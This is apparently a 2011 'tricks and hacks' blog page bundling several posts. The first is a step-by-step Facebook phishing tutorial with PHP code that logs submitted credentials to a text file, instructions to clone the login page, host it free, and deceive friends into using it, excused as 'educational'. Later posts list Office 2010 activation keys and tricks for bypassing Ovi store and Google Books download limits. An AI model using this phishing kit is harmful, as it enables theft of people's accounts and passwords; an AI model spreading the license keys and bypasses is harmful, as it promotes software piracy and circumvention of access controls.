ladies at autoexpo

CHECK ALL THE BEAUTIES AT AUTO EXPO WITH THEIR CARS AND CHECK ALL ENTERTAINMENT NEWS .

FACEBOOK TRICK UPSIDE DOWN

ENJOY FACEBOOK TRICKS AND TIPS AND UPDATES PROVIDED AND ALMOST EVERY TRICKS AND TIPS UPDATING DAILY .

OLD AND NEW SONGS DOWNLOADS

DOWNLOAD ALL TELUGU SONGS NEW SONGS AND OLD SONGS ,ALL UPDATED ,ARRANGED IN SYMBOL-WISE SEARCH .

DOWNLOAD BEAUTIFUL WALLPAPERS

DOWNLOAD ALL KINDS OF WALLPAPERS LIKE CARS , ACTRESS , ABSTRACT , AND ALMOST ALL KINDS ... .

celebrities caught

ENJOY THE CONTENT PROVIDED FOR REGULAR VIEWERS FOR MY WEBSITE , DAILY REFRESHED CONTENT .

Wednesday, 9 March 2011

How to hack facebook Account password



How to hack facebook Account password

We will we use very popular method to hack facebook account password.That is Phishing.This is one of the best method to hack facebook account password.This will work only if your friend don’t know about this method of hacking facebookFor this We need three files:

1.Fake facebook login page
2.Php file
3.Text file to store password

Create your php file

1.Open notepad and copy this code:

header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>

2.Now save this as phishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Create facebook fake login page

Now  go to http://www.facebook.com and right click / View Source.Copy source in notepad and save it as facebooklogin .html .Now open source code of this html file
We need to find the place where Login  code in facebook page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code
action=anything.
In this case we have this

action=”https://login.facebook.com/login.php?”

We replace that part with:

action=”phishing.php”

Save your facebooklogin.html file

Text file

Create a blank text file and name it password.txt

Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake facebook login page by going to http://yoursite.110mb.com/Facebooklogin.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
You can use

http://www.justfree.com/

http://www.ripway.com/

also or any other free hosting site.

Suppose you register with name facebookhack.Your link will be http://www.facebookhack.justfree.com/
After uploading files your phishing link will be http://www.facebookhack.justfree.com/facebooklogin.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like

“Use this on your own responsibility for educational purpose only“

Increase Speed UP PC Computer Speed


Increase Speed UP PC Computer Speed

One of the most effective and useful tool to speed up the performance of your computer is to defragment your hard drive. Defragmentation of the hard drive is referred to rearranging the scattered files stored in your hard drive. Actually the data you store in your hard drive increases with the course of time. Then data becomes scattered in the hard drive and needs arrangement so that computer can easily access and run programs from the hard drive. If data is arranged with the help of defragmentation then computer easily access the data and thus requires less time to access and run the programs. Remember that the files stored on the hard drive are in fragmented form. These files are very hard for the computer to open and run. That is why computer supports the defragmentation tool because it helps a lot to let the computer open and run the files.

You should defragment each volume of your hard drive so that your computer can access all volumes very easily. This easement of accessing the entire hard drive would really boost up the performance speed of your computer. There is another tool which can add to the efficiency of your computer. This tool is called rebooting the computer. Rebooting is the most essential tool which can enable your computer to run faster in terms of performance and speed. You should prefer using disk defragmenter and the proper rebooting of your computer. The combine application of both these tools will surely enable your computer to easily access any file in no time. You would enjoy the reliable and convenient usage of your computer through this way. You should keep one thing in mind that you should never use online solutions for boosting up the performance of your computer. This would cause more damage to your computer because it can contain virus and malware attack.

This article is written by Ella Green, who also writes for pckeeper.zeobit.com, a site featuring applications and downloads on registry cleaner, disk defragmenter, and disk cleaner.

Microsoft Offce 2010 Activation Product Key Serial


Microsoft Offce 2010 Activation Product Key Serial

Microsoft Office 2010 is a productivity suite for Microsoft Windows, and the successor to Microsoft Office 2007. Office 2010 includes extended file format support, user interface updates,and a changed user experience. A 64-bit version of Office 2010 is available, although not for Windows XP or Windows Server 2003.On April 15, 2010, Office 2010 was released to manufacturing. The suite became available for retail and online purchase on June 15, 2010

Microsoft Office 2010 comes with some cool features:
Enhance your presentations with photos and videos
Better integration and sharing capabilities
Create text as powerful as your images

You can download it from below.

http://office.microsoft.com/en-us/products/

You may use one of the following Multiple Activation Keys (MAK) to activate your Microsoft Office 2010 Beta products. Microsoft Office Professional Plus 2010, Microsoft Project Professional 2010, and Microsoft Visio Premium 2010 require separate activations.

Microsoft Office Professional Plus 2010: 22HGX-728MX-BBWX9-7BB8X-J96B4

Visio Premium 2010: PQCFB-YGXGC-TXB66-DH3VW-GCGYQ

Project Professional 2010: CQYRY-3KBR3-JW34C-VGH7M-MQM49

For more visit following ms office link

http://www.microsoft.com/office/2010/en/activation.aspx



How to Activate MS Office 2010.Go to the following link for activation

http://softwarekey.blogspot.com/2010/02/ms-office-2010-beta-serial-key-hacking.html

If you have your serial and product key post it here

trick Lock Your Folder Through Notepad


trick
Lock Your Folder Through Notepad


Using this technique not only lock your folder but also hide it here it.

Copy and Paste Following code in Notepad:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Now do the following steps:

1. Copy above folder into notepad.

2. The text which is written in bold letters delete it & type u r password there.

3. Save that file by extension .bat ( name is u r choice)

4. Now on your screen there is a bat file appear.

5. Double click on that file.

6. You will see the locker folder.

7. Save the files in that folder.

8. Double click on that folder & lock that folder

9. After lock that folder it will become hidden.

10. To open that folder double click on that bat file

11. Type your password & open that folder.


and also superhide u may also have riten it....because thats too imp for u and i need not present it here...

ovi hack


ovi hack

good news to all nokia smart phone users, have you ever thought of actually downloading all the stuff filled apps , themes,games ringtones and everything what ovi store provided to you for your symbian os. could not download due to poor mobile net access to your mobile led to letting you down from downloading the stuff, then here is a solution to all of you.

with this trick ,you can download everything right from your pc, and though nokia do not provide a way to download from pc, we are going to provide you a solution. Read more to know how to do it......


Requirements:

•Nokia smart phone
•Ovi account
•Notepad ++

steps:
1) log on to store.ovi.com and register for an ovi account which is free.

2) select an application which should be downloaded.
3) select send to friend option (which is meant for promoting application to friends)
4) now change the , link in the address bar as link followed by / download.
i.e
earlier : store.ovi.com/contents/5498/send-to-friend (original link)
now: store.ovi.com/contents/5498/download.(change it as)

that's it all stuff is now at your helm, take a look at all the stuff you need and grab them now. Quick get the stuff soon.

all of them can be downloaded , but as nokia supports .sisx,.sis,jar files, if any files that you have downloaded were in encryted form then you can convert those encryted files into normal form as below i.e sis.dm to sis format.


If sis.dm encountered , in order to convert it into .sis


Follow these steps:
•Open the file in notepad++
•Edit the readable text, with is present in the first 4 lines
•Including space characters and leave the remaining contents after ‘ z’
•Delete the last --boundary-1-- line

online video lectures and ppts of all branches of engineering courses at one place


online video lectures and ppts of all branches of engineering courses at one place

these video lecturers are from top professors of iits and they are usefull to some extent apart from regular text books and i do agree that not all the lectures provided are worth to be seen , most of them will come to your rescue.

check out the officical website below

http://nptel.iitm.ac.in/

Google books hack


Google books hack



google books are the ultimate one stop portal for reading books online and it does not facilitate any way for downloading books. But this simple trick ensures you to download books directly from your browser.


Requirements:

Mozilla Firefox (or) Sea monkey browser

Note:

Only using mozilla firefox browser,you can access pages for offline use.

Steps:

¡Open the desired book from google books portal.


¡Right click to open page info.

¡Select media tab and scroll down to locate the page.


¡Select save as and save the file as .jpg extension.








once you scrolled a page, you can actually save the pages which are above and below the page you are viewing . But instead if would like to download , complete book and only the one which are free for public view can be downloaded using the google book downloader software , which can be downloaded here below.




http://tinyurl.com/gbookdownloader

Twitter Delicious Facebook Digg Stumbleupon Favorites More